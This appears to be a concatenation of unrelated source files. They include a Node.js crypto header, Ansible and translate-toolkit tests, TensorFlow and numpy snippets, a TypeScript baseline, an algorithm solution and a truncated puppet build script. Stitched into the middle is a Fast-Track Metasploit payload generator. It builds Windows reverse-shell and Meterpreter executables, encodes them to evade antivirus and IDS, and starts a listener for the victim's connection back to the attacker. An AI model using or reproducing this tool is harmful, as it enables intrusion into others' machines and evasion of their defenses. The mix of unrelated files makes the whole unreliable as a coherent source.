// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
#ifndef SRC_NODE_CRYPTO_H_
#define SRC_NODE_CRYPTO_H_
#if defined(NODE_WANT_INTERNALS) && NODE_WANT_INTERNALS
// All of the crypto definitions previously contained in this header
// have been split across multiple headers in src/crypto. This header
// remains for convenience for any code that still imports it. New
// code should include the relevant src/crypto headers directly.
#include "crypto/crypto_aes.h"
#include "crypto/crypto_argon2.h"
#include "crypto/crypto_bio.h"
#include "crypto/crypto_chacha20_poly1305.h"
#include "crypto/crypto_cipher.h"
#include "crypto/crypto_context.h"
#include "crypto/crypto_dh.h"
#include "crypto/crypto_dsa.h"
#include "crypto/crypto_ec.h"
#include "crypto/crypto_hash.h"
#include "crypto/crypto_hkdf.h"
#include "crypto/crypto_hmac.h"
#if OPENSSL_VERSION_MAJOR >= 3
#include "crypto/crypto_kem.h"
#include "crypto/crypto_kmac.h"
#endif
#include "crypto/crypto_keygen.h"
#include "crypto/crypto_keys.h"
#include "crypto/crypto_ml_dsa.h"
#include "crypto/crypto_pbkdf2.h"
#include "crypto/crypto_random.h"
#include "crypto/crypto_rsa.h"
#include "crypto/crypto_scrypt.h"
#include "crypto/crypto_sig.h"
#include "crypto/crypto_spkac.h"
#include "crypto/crypto_timing.h"
#include "crypto/crypto_tls.h"
#include "crypto/crypto_util.h"
#include "crypto/crypto_x509.h"
#endif // defined(NODE_WANT_INTERNALS) && NODE_WANT_INTERNALS
#endif // SRC_NODE_CRYPTO_H_ | c | github | https://github.com/nodejs/node | src/node_crypto.h |
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.compat.tests.mock import patch
from ansible.modules.network.ios import ios_command
from .ios_module import TestIosModule, load_fixture, set_module_args
class TestIosCommandModule(TestIosModule):
module = ios_command
def setUp(self):
self.mock_run_commands = patch('ansible.modules.network.ios.ios_command.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
self.mock_run_commands.stop()
def load_fixtures(self, commands=None):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for item in commands:
try:
obj = json.loads(item['command'])
command = obj['command']
except ValueError:
command = item['command']
filename = str(command).replace(' ', '_')
output.append(load_fixture(filename))
return output
self.run_commands.side_effect = load_from_file
def test_ios_command_simple(self):
set_module_args(dict(commands=['show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 1)
self.assertTrue(result['stdout'][0].startswith('Cisco IOS Software'))
def test_ios_command_multiple(self):
set_module_args(dict(commands=['show version', 'show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 2)
self.assertTrue(result['stdout'][0].startswith('Cisco IOS Software'))
def test_ios_command_wait_for(self):
wait_for = 'result[0] contains "Cisco IOS"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module()
def test_ios_command_wait_for_fails(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 10)
def test_ios_command_retries(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for, retries=2))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 2)
def test_ios_command_match_any(self):
wait_for = ['result[0] contains "Cisco IOS"',
'result[0] contains "test string"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='any'))
self.execute_module()
def test_ios_command_match_all(self):
wait_for = ['result[0] contains "Cisco IOS"',
'result[0] contains "IOSv Software"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='all'))
self.execute_module()
def test_ios_command_match_all_failure(self):
wait_for = ['result[0] contains "Cisco IOS"',
'result[0] contains "test string"']
commands = ['show version', 'show version']
set_module_args(dict(commands=commands, wait_for=wait_for, match='all'))
self.execute_module(failed=True) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# Import modules
import subprocess,time,sys,os,re
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.search("METASPLOIT_PATH",line)
if match:
line=line.replace("METASPLOIT_PATH=","")
metapath=line
include.print_banner()
print """
The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.
This will also encode your payload to get past most AV and
IDS/IPS.
"""
try:
# Specify path to metasploit
path=metapath
# Specify payload
choice1=raw_input(''' What payload do you want to generate:
Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
<ctrl>-c to Cancel
Enter choice (example 1-6): ''')
counter=0
if choice1=='1': choice1=("windows/shell_reverse_tcp")
if choice1=='2': choice1=("windows/meterpreter/reverse_tcp")
if choice1=='3':
choice1=("windows/vncinject/reverse_tcp")
shell=raw_input("Do you want a courtesy shell yes or no: ")
if shell=='yes' or shell=='y': courtesyshell=("DisableCourtesyShell=True")
if shell=='no' or shell=='no': courtesyshell=("")
counter=counter+1
if counter==0: courtesyshell=("")
if choice1=='4': choice1=("windows/shell_bind_tcp")
# Specify Encoding Option
# re-clear the screen
include.print_banner()
encode=raw_input('''
Below is a list of encodings to try and bypass AV.
Select one of the below, Avoid_UTF8_tolower usually gets past them.
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding
Enter your choice : ''')
if encode=='1': encode=("ENCODING=avoid_utf8_tolower")
if encode=='2': encode=("ENCODING=shikata_ga_nai")
if encode=='3': encode=("ENCODING=alpha_mixed")
if encode=='4': encode=("ENCODING=alpha_upper")
if encode=='5': encode=("ENCODING=call4_dword_xor")
if encode=='6': encode=("ENCODING=countdown")
if encode=='7': encode=("ENCODING=fnstenv_mov")
if encode=='8': encode=("ENCODING=jmp_call_additive")
if encode=='9': encode=("ENCODING=nonalpha")
if encode=='10': encode=("ENCODING=nonupper")
if encode=='11': encode=("ENCODING=unicode_mixed")
if encode=='12': encode=("ENCODING=unicode_upper")
if encode=='13': encode=("ENCODING=alpha2")
if encode=='14': encode=("")
# Specify Remote Host
choice2=raw_input("\n Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): ")
choice3=raw_input(" Enter the port of the Listener: ")
choice4=raw_input('''\n Do you want to create an EXE or Shellcode
1. Executable
2. Shellcode
Enter your choice: ''')
if choice4 =='1':
choice4=("X")
choice5=("exe")
if choice4 =='2':
choice4=("C")
choice5=("txt")
# Coming soon...
#restricted=raw_input("Do you want to avoid certain restricted characters, yes or no: ")
#if restricted == 'yes' or restricted == 'y':
# restricted=raw_input(r"""
#Restricted characters are those that may get jacked up within
#the stack. Which ones would you like to avoid.
#
#Example: \x00\xff
#
#Which chars would you like to restrict: """)
# restrict=(r"-b " + "'"+restricted+"'")
# if restricted == 'no' or restricted == 'n' : restrict = ''
generatepayload=subprocess.Popen(r"%smsfpayload %s LHOST=%s LPORT=%s %s %s %s > payload.%s" % (path,choice1,choice2,choice3,encode,courtesyshell,choice4,choice5), shell=True).wait()
print "\n\n A payload has been created in this directory and is named 'payload.%s'. Enjoy!\n\n" % (choice5)
# Start listener code
listener=raw_input(" Do you want to start a listener to receive the payload yes or no: ")
if listener=='yes' or listener =='y':
# if they want a listener, start here
print "\n Launching Listener..."
# launch actual listener
print "***********************************************************************************************"
print """\n Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='%s'
Listening on IP: %s on Local Port: %s Using encoding: %s\n""" % (choice1, choice2, choice3, encode)
print "***********************************************************************************************"
listeerlaunch=subprocess.Popen("%s/msfcli exploit/multi/handler PAYLOAD=%s LHOST=%s LPORT=%s %s E" % (path,choice1,choice2,choice3,encode), shell=True).wait()
else:
print "\n\n Exiting PayloadGen...Hack the gibson....\n\n"
sys.exit(1)
# Catch all errors
except KeyboardInterrupt: print "\n\n Keyboard Interrupt Detected, exiting Payload Gen.\n"
except Exception,e:
print " Something went wrong, printing error message.."
print e | unknown | codeparrot/codeparrot-clean | ||
#include <immintrin.h>
#ifdef _MSC_VER
#include <ammintrin.h>
#else
#include <x86intrin.h>
#endif
int main(void)
{
__m128i a = _mm_comge_epu32(_mm_setzero_si128(), _mm_setzero_si128());
return _mm_cvtsi128_si32(a);
} | c | github | https://github.com/numpy/numpy | numpy/_core/src/_simd/checks/cpu_xop.c |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils for Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.util import tf_inspect
def assert_estimator_contract(tester, estimator_class):
"""Asserts whether given estimator satisfies the expected contract.
This doesn't check every details of contract. This test is used for that a
function is not forgotten to implement in a precanned Estimator.
Args:
tester: A tf.test.TestCase.
estimator_class: 'type' object of pre-canned estimator.
"""
attributes = tf_inspect.getmembers(estimator_class)
attribute_names = [a[0] for a in attributes]
tester.assertTrue('config' in attribute_names)
tester.assertTrue('evaluate' in attribute_names)
tester.assertTrue('export' in attribute_names)
tester.assertTrue('fit' in attribute_names)
tester.assertTrue('get_variable_names' in attribute_names)
tester.assertTrue('get_variable_value' in attribute_names)
tester.assertTrue('model_dir' in attribute_names)
tester.assertTrue('predict' in attribute_names)
def assert_in_range(min_value, max_value, key, metrics):
actual_value = metrics[key]
if actual_value < min_value:
raise ValueError('%s: %s < %s.' % (key, actual_value, min_value))
if actual_value > max_value:
raise ValueError('%s: %s > %s.' % (key, actual_value, max_value)) | unknown | codeparrot/codeparrot-clean | ||
"""
Given a sorted array of integers nums and integer values a, b and c. Apply a function of the form f(x) = ax2 + bx + c to each element x in the array.
The returned array must be in sorted order.
Expected time complexity: O(n)
Example:
nums = [-4, -2, 2, 4], a = 1, b = 3, c = 5,
Result: [3, 9, 15, 33]
nums = [-4, -2, 2, 4], a = -1, b = 3, c = 5
Result: [-23, -5, 1, 7]
"""
class Solution(object):
def sortTransformedArray(self, nums, a, b, c):
"""
:type nums: List[int]
:type a: int
:type b: int
:type c: int
:rtype: List[int]
"""
ans = []
if a == 0:
ans = [b*x + c for x in nums]
return ans if b >=0 else ans[::-1]
mid = -b/float(2*a)
left = [n for n in nums if n <= mid]
right = nums[len(left):]
while left and right:
if mid - left[-1] >= right[0] - mid:
x = right.pop(0)
else:
x = left.pop()
ans.append(a*x*x + b*x + c)
if left:
ans += [a*x*x + b*x + c for x in left][::-1]
if right:
ans += [a*x*x + b*x + c for x in right]
return ans if a > 0 else ans[::-1] | unknown | codeparrot/codeparrot-clean | ||
//// [tests/cases/conformance/classes/propertyMemberDeclarations/autoAccessor5.ts] ////
//// [autoAccessor5.ts]
class C1 {
accessor ["w"]: any;
accessor ["x"] = 1;
static accessor ["y"]: any;
static accessor ["z"] = 2;
}
declare var f: any;
class C2 {
accessor [f()] = 1;
}
//// [autoAccessor5.js]
"use strict";
var __classPrivateFieldGet = (this && this.__classPrivateFieldGet) || function (receiver, state, kind, f) {
if (kind === "a" && !f) throw new TypeError("Private accessor was defined without a getter");
if (typeof state === "function" ? receiver !== state || !f : !state.has(receiver)) throw new TypeError("Cannot read private member from an object whose class did not declare it");
return kind === "m" ? f : kind === "a" ? f.call(receiver) : f ? f.value : state.get(receiver);
};
var __classPrivateFieldSet = (this && this.__classPrivateFieldSet) || function (receiver, state, value, kind, f) {
if (kind === "m") throw new TypeError("Private method is not writable");
if (kind === "a" && !f) throw new TypeError("Private accessor was defined without a setter");
if (typeof state === "function" ? receiver !== state || !f : !state.has(receiver)) throw new TypeError("Cannot write private member to an object whose class did not declare it");
return (kind === "a" ? f.call(receiver, value) : f ? f.value = value : state.set(receiver, value)), value;
};
var _C2__a_accessor_storage, _a;
var C1 = /** @class */ (function () {
function C1() {
_C1__b_accessor_storage.set(this, void 0);
_C1__c_accessor_storage.set(this, 1);
}
Object.defineProperty(C1.prototype, (_C1__b_accessor_storage = new WeakMap(), _C1__c_accessor_storage = new WeakMap(), "w"), {
get: function () { return __classPrivateFieldGet(this, _C1__b_accessor_storage, "f"); },
enumerable: false,
configurable: true
});
Object.defineProperty(C1.prototype, "w", {
set: function (value) { __classPrivateFieldSet(this, _C1__b_accessor_storage, value, "f"); },
enumerable: false,
configurable: true
});
Object.defineProperty(C1.prototype, "x", {
get: function () { return __classPrivateFieldGet(this, _C1__c_accessor_storage, "f"); },
set: function (value) { __classPrivateFieldSet(this, _C1__c_accessor_storage, value, "f"); },
enumerable: false,
configurable: true
});
Object.defineProperty(C1, "y", {
get: function () { return __classPrivateFieldGet(_b, _b, "f", _C1__d_accessor_storage); },
set: function (value) { __classPrivateFieldSet(_b, _b, value, "f", _C1__d_accessor_storage); },
enumerable: false,
configurable: true
});
Object.defineProperty(C1, "z", {
get: function () { return __classPrivateFieldGet(_b, _b, "f", _C1__e_accessor_storage); },
set: function (value) { __classPrivateFieldSet(_b, _b, value, "f", _C1__e_accessor_storage); },
enumerable: false,
configurable: true
});
var _b, _C1__b_accessor_storage, _C1__c_accessor_storage, _C1__d_accessor_storage, _C1__e_accessor_storage;
_b = C1;
_C1__d_accessor_storage = { value: void 0 };
_C1__e_accessor_storage = { value: 2 };
return C1;
}());
var C2 = /** @class */ (function () {
function C2() {
_C2__a_accessor_storage.set(this, 1);
}
Object.defineProperty(C2.prototype, (_C2__a_accessor_storage = new WeakMap(), _a = f()), {
get: function () { return __classPrivateFieldGet(this, _C2__a_accessor_storage, "f"); },
enumerable: false,
configurable: true
});
Object.defineProperty(C2.prototype, _a, {
set: function (value) { __classPrivateFieldSet(this, _C2__a_accessor_storage, value, "f"); },
enumerable: false,
configurable: true
});
return C2;
}()); | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/autoAccessor5(target=es5).js |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from translate.convert import po2prop, test_convert
from translate.misc import wStringIO
from translate.storage import po
class TestPO2Prop:
def po2prop(self, posource):
"""helper that converts po source to .properties source without requiring files"""
inputfile = wStringIO.StringIO(posource)
inputpo = po.pofile(inputfile)
convertor = po2prop.po2prop()
outputprop = convertor.convertstore(inputpo)
return outputprop
def merge2prop(self, propsource, posource, personality="java", remove_untranslated=False):
"""helper that merges po translations to .properties source without requiring files"""
inputfile = wStringIO.StringIO(posource)
inputpo = po.pofile(inputfile)
templatefile = wStringIO.StringIO(propsource)
#templateprop = properties.propfile(templatefile)
convertor = po2prop.reprop(templatefile, inputpo, personality=personality, remove_untranslated=remove_untranslated)
outputprop = convertor.convertstore()
print(outputprop)
return outputprop
def test_merging_simple(self):
"""check the simplest case of merging a translation"""
posource = '''#: prop\nmsgid "value"\nmsgstr "waarde"\n'''
proptemplate = '''prop=value\n'''
propexpected = '''prop=waarde\n'''
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected
def test_merging_untranslated(self):
"""check the simplest case of merging an untranslated unit"""
posource = '''#: prop\nmsgid "value"\nmsgstr ""\n'''
proptemplate = '''prop=value\n'''
propexpected = proptemplate
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected
def test_hard_newlines_preserved(self):
"""check that we preserver hard coded newlines at the start and end of sentence"""
posource = '''#: prop\nmsgid "\\nvalue\\n\\n"\nmsgstr "\\nwaarde\\n\\n"\n'''
proptemplate = '''prop=\\nvalue\\n\\n\n'''
propexpected = '''prop=\\nwaarde\\n\\n\n'''
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected
def test_space_preservation(self):
"""check that we preserve any spacing in properties files when merging"""
posource = '''#: prop\nmsgid "value"\nmsgstr "waarde"\n'''
proptemplate = '''prop = value\n'''
propexpected = '''prop = waarde\n'''
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected
def test_merging_blank_entries(self):
"""check that we can correctly merge entries that are blank in the template"""
posource = r'''#: accesskey-accept
msgid ""
"_: accesskey-accept\n"
""
msgstr ""'''
proptemplate = 'accesskey-accept=\n'
propexpected = 'accesskey-accept=\n'
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected
def test_merging_fuzzy(self):
"""check merging a fuzzy translation"""
posource = '''#: prop\n#, fuzzy\nmsgid "value"\nmsgstr "waarde"\n'''
proptemplate = '''prop=value\n'''
propexpected = '''prop=value\n'''
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected
def test_mozilla_accesskeys(self):
"""check merging Mozilla accesskeys"""
posource = '''#: prop.label prop.accesskey
msgid "&Value"
msgstr "&Waarde"
#: key.label key.accesskey
msgid "&Key"
msgstr "&Sleutel"
'''
proptemplate = '''prop.label=Value
prop.accesskey=V
key.label=Key
key.accesskey=K
'''
propexpected = '''prop.label=Waarde
prop.accesskey=W
key.label=Sleutel
key.accesskey=S
'''
propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
print(propfile)
assert propfile == propexpected
def test_mozilla_accesskeys_missing_accesskey(self):
"""check merging Mozilla accesskeys"""
posource = '''#: prop.label prop.accesskey
# No accesskey because we forgot or language doesn't do accesskeys
msgid "&Value"
msgstr "Waarde"
'''
proptemplate = '''prop.label=Value
prop.accesskey=V
'''
propexpected = '''prop.label=Waarde
prop.accesskey=V
'''
propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
print(propfile)
assert propfile == propexpected
def test_mozilla_margin_whitespace(self):
"""Check handling of Mozilla leading and trailing spaces"""
posource = '''#: sepAnd
msgid " and "
msgstr " و "
#: sepComma
msgid ", "
msgstr "، "
'''
proptemplate = r'''sepAnd = \u0020and\u0020
sepComma = ,\u20
'''
propexpected = r'''sepAnd = \u0020و\u0020
sepComma = ،\u0020
'''
propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
print(propfile)
assert propfile == propexpected
def test_mozilla_all_whitespace(self):
"""Check for all white-space Mozilla hack, remove when the
corresponding code is removed."""
posource = '''#: accesskey-accept
msgctxt "accesskey-accept"
msgid ""
msgstr " "
#: accesskey-help
msgid "H"
msgstr "م"
'''
proptemplate = '''accesskey-accept=
accesskey-help=H
'''
propexpected = '''accesskey-accept=
accesskey-help=م
'''
propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
print(propfile)
assert propfile == propexpected
def test_merging_propertyless_template(self):
"""check that when merging with a template with no property values that we copy the template"""
posource = ""
proptemplate = "# A comment\n"
propexpected = proptemplate
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected
def test_delimiters(self):
"""test that we handle different delimiters."""
posource = '''#: prop\nmsgid "value"\nmsgstr "translated"\n'''
proptemplate = '''prop %s value\n'''
propexpected = '''prop %s translated\n'''
for delim in ['=', ':', '']:
print("testing '%s' as delimiter" % delim)
propfile = self.merge2prop(proptemplate % delim, posource)
print(propfile)
assert propfile == propexpected % delim
def test_empty_value(self):
"""test that we handle an value in the template"""
posource = '''#: key
msgctxt "key"
msgid ""
msgstr "translated"
'''
proptemplate = '''key\n'''
propexpected = '''key = translated\n'''
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected
def test_personalities(self):
"""test that we output correctly for Java and Mozilla style property files. Mozilla uses Unicode, while Java uses escaped Unicode"""
posource = u'''#: prop\nmsgid "value"\nmsgstr "ṽḁḽṻḝ"\n'''
proptemplate = u'''prop = value\n'''
propexpectedjava = u'''prop = \\u1E7D\\u1E01\\u1E3D\\u1E7B\\u1E1D\n'''
propfile = self.merge2prop(proptemplate, posource)
assert propfile == propexpectedjava
propexpectedmozilla = u'''prop = ṽḁḽṻḝ\n'''.encode('utf-8')
propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
assert propfile == propexpectedmozilla
proptemplate = u'''prop = value\n'''.encode('utf-16')
propexpectedskype = u'''prop = ṽḁḽṻḝ\n'''.encode('utf-16')
propfile = self.merge2prop(proptemplate, posource, personality="skype")
assert propfile == propexpectedskype
proptemplate = u'''"prop" = "value";\n'''.encode('utf-16')
propexpectedstrings = u'''"prop" = "ṽḁḽṻḝ";\n'''.encode('utf-16')
propfile = self.merge2prop(proptemplate, posource, personality="strings")
assert propfile == propexpectedstrings
def test_merging_untranslated_simple(self):
"""check merging untranslated entries in two 1) use English 2) drop key, value pair"""
posource = '''#: prop\nmsgid "value"\nmsgstr ""\n'''
proptemplate = '''prop = value\n'''
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == proptemplate # We use the existing values
propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
print(propfile)
assert propfile == '' # We drop the key
def test_merging_untranslated_multiline(self):
"""check merging untranslated entries with multiline values"""
posource = '''#: prop\nmsgid "value1 value2"\nmsgstr ""\n'''
proptemplate = '''prop = value1 \
value2
'''
propexpected = '''prop = value1 value2\n'''
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected # We use the existing values
propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
print(propfile)
assert propfile == '' # We drop the key
def test_merging_untranslated_comments(self):
"""check merging untranslated entries with comments"""
posource = '''#: prop\nmsgid "value"\nmsgstr ""\n'''
proptemplate = '''# A comment\nprop = value\n'''
propexpected = '# A comment\nprop = value\n'
propfile = self.merge2prop(proptemplate, posource)
print(propfile)
assert propfile == propexpected # We use the existing values
propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
print(propfile)
# FIXME ideally we should drop the comment as well as the unit
assert propfile == '# A comment\n' # We drop the key
def test_merging_untranslated_unchanged(self):
"""check removing untranslated entries but keeping unchanged ones"""
posource = '''#: prop
msgid "value"
msgstr ""
#: prop2
msgid "value2"
msgstr "value2"
'''
proptemplate = '''prop=value
prop2=value2
'''
propexpected = '''prop2=value2\n'''
propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
print(propfile)
assert propfile == propexpected
def test_merging_blank(self):
"""We always merge in a blank translation for a blank source"""
posource = '''#: prop
msgctxt "prop"
msgid ""
msgstr "value"
#: prop2
msgctxt "prop2"
msgid ""
msgstr ""
'''
proptemplate = '''prop=
prop2=
'''
propexpected = '''prop=value
prop2=
'''
propfile = self.merge2prop(proptemplate, posource, remove_untranslated=False)
print(propfile)
assert propfile == propexpected
propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
print(propfile)
assert propfile == propexpected
def test_gaia_plurals(self):
"""Test back conversion of gaia plural units."""
proptemplate = '''
message-multiedit-header={[ plural(n) ]}
message-multiedit-header[zero]=Edit
message-multiedit-header[one]={{ n }} selected
message-multiedit-header[two]={{ n }} selected
message-multiedit-header[few]={{ n }} selected
message-multiedit-header[many]={{ n }} selected
message-multiedit-header[other]={{ n }} selected
'''
posource = r'''#: message-multiedit-header[zero]
msgctxt "message-multiedit-header[zero]"
msgid "Edit"
msgstr "Redigeer"
#: message-multiedit-header
msgctxt "message-multiedit-header"
msgid "Edit"
msgid_plural "{{ n }} selected"
msgstr[0] "xxxRedigeerxxx"
msgstr[1] "{{ n }} gekies"
msgstr[2] "{{ n }} gekies"
msgstr[3] "{{ n }} gekies"
msgstr[4] "{{ n }} gekies"
msgstr[5] "{{ n }} gekies"
'''
propexpected = '''
message-multiedit-header={[ plural(n) ]}
message-multiedit-header[zero]=Redigeer
message-multiedit-header[one]={{ n }} gekies
message-multiedit-header[two]={{ n }} gekies
message-multiedit-header[few]={{ n }} gekies
message-multiedit-header[many]={{ n }} gekies
message-multiedit-header[other]={{ n }} gekies
'''
propfile = self.merge2prop(proptemplate, posource, personality="gaia")
assert propfile == propexpected
class TestPO2PropCommand(test_convert.TestConvertCommand, TestPO2Prop):
"""Tests running actual po2prop commands on files"""
convertmodule = po2prop
defaultoptions = {"progress": "none"}
def test_help(self):
"""tests getting help"""
options = test_convert.TestConvertCommand.test_help(self)
options = self.help_check(options, "-t TEMPLATE, --template=TEMPLATE")
options = self.help_check(options, "--fuzzy")
options = self.help_check(options, "--threshold=PERCENT")
options = self.help_check(options, "--personality=TYPE")
options = self.help_check(options, "--encoding=ENCODING")
options = self.help_check(options, "--removeuntranslated")
options = self.help_check(options, "--nofuzzy", last=True) | unknown | codeparrot/codeparrot-clean | ||
import os
import sys
from gettext import gettext as _
from optparse import OptionParser, OptionGroup
from subprocess import Popen, PIPE
from hashlib import sha256
PKG_DIR = 'pkg'
ARCHIVE_SUFFIX = '.tar.gz'
PATH = _('the path to be searched for puppet modules. the path must be'
' relative to the working directory. when not specified,'
' the working directory is searched.')
URL = _('the URL to a git repository to be cloned. repositories'
' will be cloned into the working directory. cloning will'
' set the (-p|--path) to the repository root when (-p|--path) is'
' not specified.')
BRANCH = _('the name of a git branch to be checked out.')
TAG = _('the name of a git tag to be checked out.')
WORKING_DIR = _('set the working directory. default: current directory.')
OUTPUT_DIR = _('set the output directory. this can be either an absolute path'
' or a path that is relative to the working directory.'
' default: working directory.')
CLEAN = _('delete cloned repositories before and after building.')
USAGE = _('%prog <options> [working-dir]')
DESCRIPTION = _(
'Build puppet modules.'
' Search the working directory and build all puppet modules found. The working'
' directory is the current directory unless the (-w|--working-dir) option is specified.'
' The (-p|--path) option may be used to specify a directory to search/build and'
' can be either an absolute path or a path relative to the working directory.'
' The archive built using \'puppet module build\' is copied to the output directory'
' The output directory is the current directory unless (-o|--output-dir) is'
' specified. The output directory may be either an absolute path or a path that is'
' relative to the working directory.'
' \nSeveral options are provided for working with git. Repositories may be cloned'
' by specifying the (-u|--url) option. After cloning git repositories, the (-p|--path)'
' is set to the root of the cloned repository unless specified explicitly.'
' The repository branch may be selected by using the (-b|--branch) option.'
' In all cases, when the working directory is a git repository, a \'git pull\' is'
' performed to ensure that the repository is up to date.'
'\n')
BAD_PATH = _('(-p|--path) must be a relative path')
BAD_BRANCH_AND_TAG = _('(-b|--branch) and (-t|--tag) conflict')
def chdir(path):
"""
Change the working directory. The main purpose for this method
is to ignore path=None and display the change of directory to the user.
:param path: A directory path.
:type path: str
"""
if path:
print 'cd %s' % path
os.chdir(path)
def shell(command, exit_on_err=True):
"""
Invoke shell commands and return the exit-code and any
output written by the command to stdout.
:param command: The command to invoke.
:type command: str
:param exit_on_err: Exit the script if the command fails.
:type exit_on_err: bool
:return: (exit-code, output)
:rtype: tuple
"""
print command
call = command.split()
p = Popen(call, stdout=PIPE, stderr=PIPE)
status, output = p.wait(), p.stdout.read()
if exit_on_err and status != os.EX_OK:
print p.stderr.read()
sys.exit(status)
return status, output
def get_options():
"""
Parse and return command line options.
Sets defaults and validates options.
:return: The options passed by the user.
:rtype: optparse.Values
"""
parser = OptionParser(usage=USAGE, description=DESCRIPTION)
parser.add_option('-w', '--working-dir', dest='working_dir', help=WORKING_DIR)
parser.add_option('-o', '--output-dir', dest='output_dir', help=OUTPUT_DIR)
parser.add_option('-c', '--clean', default=False, action='store_true', help=CLEAN)
git = OptionGroup(parser, 'git')
git.add_option('-u', '--url', help=URL)
git.add_option('-b', '--branch', help=BRANCH)
git.add_option('-t', '--tag', help=TAG)
parser.add_option('-p', '--path', help=PATH)
parser.add_option_group(git)
(opts, args) = parser.parse_args()
# validate
if opts.path and opts.path.startswith('/'):
print BAD_PATH
sys.exit(os.EX_USAGE)
if opts.branch and opts.tag:
print BAD_BRANCH_AND_TAG
sys.exit(os.EX_USAGE)
# expand paths
if opts.working_dir:
opts.working_dir = os.path.expanduser(opts.working_dir)
if opts.output_dir:
opts.output_dir = os.path.expanduser(opts.output_dir)
# set defaults
if not opts.working_dir:
if args:
opts.working_dir = args[0]
else:
opts.working_dir = os.getcwd()
if not opts.output_dir:
opts.output_dir = opts.working_dir
return opts
def set_origin(options):
"""
Detect whether the working-directory is a git repository
and set the origin URL in the *options* passed in.
:param options: The command line options.
:type options: optparse.Options
"""
status, output = shell('git status', False)
if status != 0:
# not in a git repository
options.origin = None
return
status, output = shell('git remote show -n origin')
for line in output.split('\n'):
line = line.strip()
if line.startswith('Fetch URL:'):
url = line.split(':', 1)[1]
options.origin = url.strip()
def git_clone(options):
"""
Clone the git repository only if the user specified to do so using
the (-u|--url) option. Assuming the user is cloning the repository
for the purpose of building puppet modules within it, the *path* option
is set to root of the cloned repository for convenience.
